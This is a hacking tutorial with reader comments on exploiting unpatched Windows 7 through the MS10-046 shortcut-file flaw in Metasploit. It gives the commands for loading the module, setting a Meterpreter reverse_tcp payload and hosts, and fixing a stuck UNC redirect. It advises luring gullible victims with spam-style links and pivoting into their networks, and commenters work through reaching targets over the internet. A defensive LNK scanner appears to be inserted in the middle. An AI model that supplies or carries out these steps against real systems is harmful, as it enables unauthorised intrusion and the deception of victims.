How to Hack Windows 7: Sending Vulnerable Shortcut Files

Welcome back, my greenhorn hackers!

After the disaster that was Windows Vista and the limited and reluctant adoption of Windows 8 and 8.1, Windows 7 has become the de facto standard operating system on the desktop/client.

Although the most valuable information to the hacker resides on servers, sometimes the best way to get to a fortified server is through a vulnerable client on the same network with inexperienced and gullible users and numerous insecure applications.

Beginning with this tutorial, I will be showing you numerous ways to attack and exploit Windows 7. I already have a tutorial on sending a malicious link that can be used against Internet Explorer 8 on Windows XP, Vista, Server 2003, Server 2008 and Windows 7, and another on how to crash Windows 7 by creating an infinite loop.

Microsoft finally got the message that they need to make their operating systems more secure and they have done so. Attacking their operating systems has become increasingly difficult. Fortunately, for the hacker, the same cannot be said for their browser, Office Suite, and other apps, as well as all of the third-party applications that reside on the typical client system and, sometimes—on the server.

We will focus on attacking those vulnerabilities in the browser and the apps on Windows 7 in order to gain access and own those systems in the following "How to Hack Windows 7" series of tutorials. In this installment, we'll be sending a malicious link thanks to a vulnerability in the handling of Windows Shortcut files.

Step 1: Open Metasploit

Let's start by opening Metasploit. You can do that by using the menu system in BackTrack, or more simply, typing:

  • bt > msfconsole

You will be greeted by a screen like this.

Step 2: Load the Exploit

In this Windows 7 hack, we will be using an exploit that Microsoft numbers MS10-046 in its Security Bulletins (CVE-2010-2568). It is not a buffer overflow: it is a DLL-loading flaw in the way the Windows Shell resolves the icon of a Control Panel entry referenced from a shortcut (.LNK) file, which makes the Shell load an attacker-supplied DLL with LoadLibrary(). Microsoft patched it out-of-band in August 2010 (KB2286198), so it only works against a target that never received that update. Let's load it by typing:

  • msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Step 3: Get the Info

Now that we have it loaded in the Metasploit framework, let's get more info on this exploit to better understand what we will be doing.

  • msf > info

As we can read at the bottom, the developer of the exploit writes:

"This module exploits a vulnerability in the handling of Windows Shortcut file (.LNK) that contain an icon resource pointing to a malicious DLL."

Essentially, we will be creating a shortcut file whose Control Panel item points at our DLL. When the victim's Explorer renders the folder that contains the shortcut, the Shell loads that DLL just to draw the shortcut's icon, and the DLL's entry point runs our payload. The victim does not even have to click the shortcut itself; having Explorer display it is enough.
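The following is an added example, not code from the tutorial or from Metasploit: a small parser for the .LNK header and LinkTargetIDList (the MS-SHLLINK structures) that flags the pattern this module builds, namely a Control Panel item in the ID list together with a .cpl/.dll or UNC reference. The two sample shortcuts are constructed inline and simplified (they do not reproduce Metasploit's exact item layout); the CLSIDs and the 192.0.2.10 share path are the only values assumed.

```python
"""Scan a Windows shortcut (.LNK) for the MS10-046 / CVE-2010-2568 pattern.

The Shell resolved the icon of a Control Panel item found in a shortcut's
LinkTargetIDList by loading the referenced .cpl/.dll, which runs its DllMain.
This scanner parses the ShellLinkHeader and the ID list and reports items
carrying a Control Panel CLSID or a DLL/CPL/UNC reference. The sample
shortcuts below are constructed for this example, not taken from the tutorial.
"""
import struct

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")            # {00021401-0000-0000-C000-000000000046}
CONTROL_PANEL_CLSID = bytes.fromhex("2020ec21ea3a6910a2dd08002b30309d")  # {21EC2020-3AEA-1069-A2DD-08002B30309D}
MY_COMPUTER_CLSID = bytes.fromhex("e04fd020ea3a6910a2d808002b30309d")    # {20D04FE0-3AEA-1069-A2D8-08002B30309D}
HAS_LINK_TARGET_ID_LIST = 0x00000001  # LinkFlags bit: an ID list follows the header


def parse_id_list(data, offset):
    """Return the ItemID bodies of the LinkTargetIDList that starts at offset."""
    (id_list_size,) = struct.unpack_from("<H", data, offset)
    end = offset + 2 + id_list_size
    pos = offset + 2
    items = []
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", data, pos)
        if item_size == 0:  # TerminalID: two zero bytes end the list
            break
        if item_size < 2 or pos + item_size > end:
            raise ValueError("malformed ItemID at offset %d" % pos)
        items.append(data[pos + 2:pos + item_size])  # size field counts itself
        pos += item_size
    return items


def _has_utf16(item, needle):
    """Case-insensitive search for an ASCII needle encoded as UTF-16LE."""
    return needle.lower().encode("utf-16-le") in item.lower()


def scan_lnk(data):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a .LNK file")
    findings = []
    if not flags & HAS_LINK_TARGET_ID_LIST:
        return findings
    for i, item in enumerate(parse_id_list(data, HEADER_SIZE)):
        if CONTROL_PANEL_CLSID in item:
            findings.append("item %d: Control Panel CLSID (icon is obtained by loading a CPL)" % i)
        for ext in (".cpl", ".dll"):
            if _has_utf16(item, ext):
                findings.append("item %d: references a %s file" % (i, ext))
        if _has_utf16(item, "\\\\"):
            findings.append("item %d: UNC path (remote share)" % i)
    return findings


def build_lnk(items):
    """Construct a minimal shortcut: a 76-byte header plus an ID list of the given bodies."""
    flags = HAS_LINK_TARGET_ID_LIST if items else 0
    # HeaderSize, LinkCLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1, Reserved2, Reserved3
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(it) + 2) + it for it in items) + b"\x00\x00"
    return header + struct.pack("<H", len(body)) + body


# Constructed benign shortcut: one item naming a local folder.
SAMPLE_BENIGN = build_lnk([b"\x31" + "C:\\Users\\Public".encode("utf-16-le")])

# Constructed suspicious shortcut: My Computer -> Control Panel -> an entry whose
# "CPL" is a DLL on a remote share (the shape the exploit relies on; simplified).
SAMPLE_SUSPICIOUS = build_lnk([
    b"\x1f" + MY_COMPUTER_CLSID,
    b"\x1f" + CONTROL_PANEL_CLSID,
    b"\x00" + "\\\\192.0.2.10\\share\\payload.dll".encode("utf-16-le"),
])

if __name__ == "__main__":
    for name, blob in (("benign", SAMPLE_BENIGN), ("suspicious", SAMPLE_SUSPICIOUS)):
        print(name, scan_lnk(blob) or "clean")
```

Legitimate shortcuts to Control Panel applets also carry that CLSID, so the strong signal is the combination: a Control Panel item whose target is a DLL outside System32 or on a UNC share. A production scanner would also inspect the IconLocation string in the StringData section and run over every .LNK arriving on removable media or via WebDAV, which is exactly the delivery path this module uses.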

Step 4: Set the Options

With the exploit loaded and the knowledge of how it works, let's set the required options. First, set the Payload. My preference is the great and powerful (sounds like Oz) Meterpreter.

  • set PAYLOAD windows/meterpreter/reverse_tcp

Now we need to set the IP of our system as LHOST:

  • set LHOST 192.168.1.111

Once we have these options set, we can simply type "exploit" to generate the exploit. Unlike some of our other remote exploits, this module does not attack the browser directly: it starts a WebDAV server on our machine (bound to SRVHOST, listening on port 80 by default) and prints a URL. When Internet Explorer visits that URL it is redirected to a UNC path of the form \\<our IP>\<random>\, Explorer opens that share, and the .LNK and .DLL served from it do the rest. If the console only keeps printing "Sending UNC redirect" and nothing else happens, set SRVHOST (and UNCHOST) to the same address as LHOST so that the UNC path handed to the victim is one it can actually reach.

As you can see where I have highlighted in the above screenshot, Metasploit has generated the exploit and then started a server to host the exploit. Our job now is to get the victim to click on the link.

Step 5: Send the Link to the Victim

We need to be creative here. This is the social engineering part of this hack. One way or another, we need to induce the victim to click on our link.

We've all seen those spam emails that claim to help us acquire a small fortune by working at home, grow our penises to proportions that would make a stallion envious, and apply for millions of dollars in unclaimed bank funds. Or, it could simply be something as innocent-sounding as watching a hilarious cat video. If we click on any of the links, we're likely to become a victim of a hack like this one.

You might say "no one would be so gullible," but in reality there is no shortage of such gullible people. Some of the greatest hacks in history (RSA and the NY Times come immediately to mind) have been accomplished this way. When all is said and done, I believe that the hackers who gained access to the credit card numbers at Target gained their foothold inside that network by getting one unwitting employee to click on a link such as this.

So...we have the link and the victim clicks on it like in the screenshot below.

Now, here is the crucial and tricky part...

The victim will be greeted by a security warning. The victim must "Allow" the code to run. Many, or probably most users will know better than to "Allow," but it only requires one user of thousands to compromise an entire network. Make the link sound compelling enough and SOMEONE will click "Allow," especially if it comes from someone they know or think they know and trust.

Step 6: Send the Exploit and Payload

When the victim clicks on the "Allow" prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. In my experience, even on an unpatched Windows 7 system, it does not always work, so be persistent. Persistence and creativity are key attributes of a successful hacker.

Step 7: Success!

If we have done everything correctly and the victim is vulnerable and naive, we will be greeted by the meterpreter prompt!

Now that we have a Meterpreter session on this Windows 7 system, we can do a great deal with this computer. Far more importantly, if this machine is on a large network, we can use it as a pivot toward other systems on that network.

Keep coming back, my greenhorn hackers, for more on hacking Windows 7 systems.

60 Comments

I'll try soon; I hope it works well.

@Bart Capel

Your code has a syntax error; it should be:

use windows/browser/ms10_046_shortcut_icon_dllloader
:)

All The Best

exploit/windows/browser/ms10_046_shortcut_icon_dllloader
if you are using Kali

specifically

use exploit/windows/browser/ms10-046-shortcut-icon-dllloader

replace the dashes with underscores, for some reason its not letting me put them in

exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Did you read the message there from Metasploit? Your anti-virus has corrupted Metasploit.

I'm getting "unknown command" on the first step... using BT5 on VMware Player.

Yeah, got it right... you might want to correct the command in the second step for others.

Can a single link be sent to multiple targets? If not, then how do I create multiple servers?

Now I just have to send the link? The first one?

The link is not working... I have made it like 10 times. I tried to open it on another computer on another network, but it does not open any security-warning-like thing. Any idea where I might have gone wrong?

As our enlightened friend (ARSLAN) here has pointed out, the prompt given in the text is wrong; it should be "use windows/browser/ms10_046_shortcut_icon_dllloader" (it is noted in the screenshot though, guys, if you had looked... also given that it's a BROWSER exploit... Give Master OTW the credit he deserves!!)

Although, in other news, it's worth noting that "host/anything.lnk" seems to be the way to get this to send.

On another note, Master, would it be possible to embed the Meterpreter into a .pdf and serve it from the server built by this exploit?

If so how would we change what the server reference points to?

Existing:

Yes, but they would have to choose to download the pdf.

OTW

I'm a newbie, so a lot of questions... :P
Does the link work only for targets on the same network connection, or for everyone?
Also, is it necessary for the target to open the link in IE?

It will work on any IP, but only on IE.

Hmm, so is there any method for Chrome and other browsers?

Will you point me in the right direction... any tutorial?

I don't have a tutorial up yet, but you can find the exploits by using Metasploit's search function.

Search chrome

Hmm, and one final Q... do you prefer Kali or BackTrack?

The link is not working over the internet for me... I tried from my friend's computer... please help me... waiting for a reply.

Thanks in Advance..

I will have to commend you on your tutorials, OccupyTheWeb. They are very understandable and straightforward. Thanks. But I am faced with a problem I don't understand: after I do everything and test it on my Windows 7, in my Kali I keep getting 'ms10_046_shortcut_icon_dllloader - Sending UNC redirect' and it never stops. Is it that it is not vulnerable, or what is the cause? In the Metasploit options it says 'UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).' I don't understand it. Please help me.

Jude:

Can you send a screenshot?

OTW

I am also facing the same issue... it keeps sending UNC redirect... PFA for the same.

Please help me in this..

Hi, I'm new here!

I did all the things with my Kali system and on my other machine with Windows7 I opened the link in InternetExplorer.
The console on my Kali says:

ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /jNUOe/ ...

But then nothing happens. What do I have to do now?
And does it only work with IE, or with Firefox or Chrome too?

Thanks, guys!

Noob:

Can you post a screenshot? There are so many reasons this might fail, but a screenshot might give us a hint.

OTW

Now I tried it again and nothing happens after that. What did I do wrong?

My conclusion: it ought to work just on internal networks, because I tested both possibilities and only one had a response. Moreover, I think this is no longer a feasible exploit.

About that "Sending UNC redirect" stuck message that a lot of us are getting with this, I've realized something: it only shows on your terminal if you send the link with "/" instead of "\", for instance "//192.168.1.16/anything/" instead of "\\192.168.1.16\anything\". Both of them open Windows Explorer, where you can see the dll and the lnk files being created, although if you use "\" Internet Explorer doesn't ask for your permission to open the link, which I find kind of strange... Does this hack work both ways? I just found the differences; I'm still just a noob with Linux, Kali, Metasploit, Meterpreter and anything beyond Microsoft Windows itself.

Hello, guys

I am getting the same message

192.168.1.105 ms10_046_shortcut_icon_dllloader - Sending UNC redirect
192.168.1.105 ms10_046_shortcut_icon_dllloader - Sending UNC redirect

Is there any solution for this?

Did you follow the directions?

You can look at my screenshots; I have done everything exactly as in the tutorial...


And when the link is clicked I get this...


I don't know what I'm doing wrong here; maybe it's the LHOST, I'm typing it wrong...

Thanks

Yes sir ... I swear i did ;-P

Please, can anyone tell me what's going on here? I tried it many times and get the same results...

Hi, have you tried to add: set SRVHOST 192.168.1.104 ?

Thanks for the reply...

It worked; here is the result, but it is stuck on
Sending directory multistatus for / ...

for a long time. Any suggestions why?


You are using the same LHOST & SRVHOST IP, yes?

  1. SRVHOST
  2. Payload
  3. LHOST
  4. exploit

Where it's dying is where you get the Meterpreter.

Yes I am using the same LHOST & SRVHOST (192.168.1.104)

I did exactly the same steps 1 to 4... and at the end, where it is stuck, I'm supposed to get the Meterpreter... is there any other way to do this?

But later today I will try to do it again.

Hello,

I am still not getting the Meterpreter; any suggestions?
When the link is clicked it always gets stuck at different places, as in the screenshot.


Hello, what version of Windows are you using this on?

Never mind, Duh... If the machine has KB2286198 this exploit is dead.

OK, cool, so this is not going to work unless someone is not updated.

But I have one question: normally I set the LHOST address (192.168.1.104) and it works locally; I checked it on a computer outside my local network and it did not work...

What should I set the LHOST address to so that it works on the WAN?

thanks

Would this hack work on Windows XP SP3? (I tried a Windows XP hack, but the SP3 update fixed it.) {Trying to hack an extra computer I have at my house, for practice}

When I did it, instead of sending anything it kept saying 'redirecting' or something like that, and on the hosted site there wasn't an allow/don't allow popup; there was just a crap ton of reloading ads. This might have something to do with my Flash Player being disabled... maybe. Also, I was wondering if you could change the background of the page to look like a trusted site.

I get this... after this nothing happens.

After getting the Meterpreter, how can I get to cmd?

Use the command 'shell' once you are in the session.

I've searched for MS10-045 and the only 2 exploits I could find were:
exploit/windows/email/ms10_045_outlook_ref_only

and

exploit/windows/email/ms10_045_outlook_ref_resolve
